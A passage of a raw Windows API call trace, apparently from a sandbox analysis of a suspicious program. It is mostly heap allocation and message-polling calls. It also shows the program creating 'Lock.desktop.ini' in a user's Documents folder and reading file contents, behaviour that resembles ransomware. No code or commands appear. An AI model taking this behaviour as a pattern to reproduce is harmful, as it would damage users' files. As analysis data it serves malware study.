hHeap=0x2af0000) returned 1 [0215.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854d58 [0215.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.679] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d58 | out: hHeap=0x2af0000) returned 1 [0215.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0215.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0215.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0215.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0215.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54ed020 [0215.685] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.685] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x192, lpOverlapped=0x0) returned 1 [0215.687] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x192) returned 0x2a683a8 [0215.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54ed020 | out: hHeap=0x2af0000) returned 1 [0215.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x192) returned 0x2a75e50 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x192) returned 0x2a683a8 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0215.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0215.691] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x192) returned 0x2a683a8 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0215.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x192) returned 0x2a75160 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0215.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.693] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0215.693] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.694] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.695] HeapFree (in: 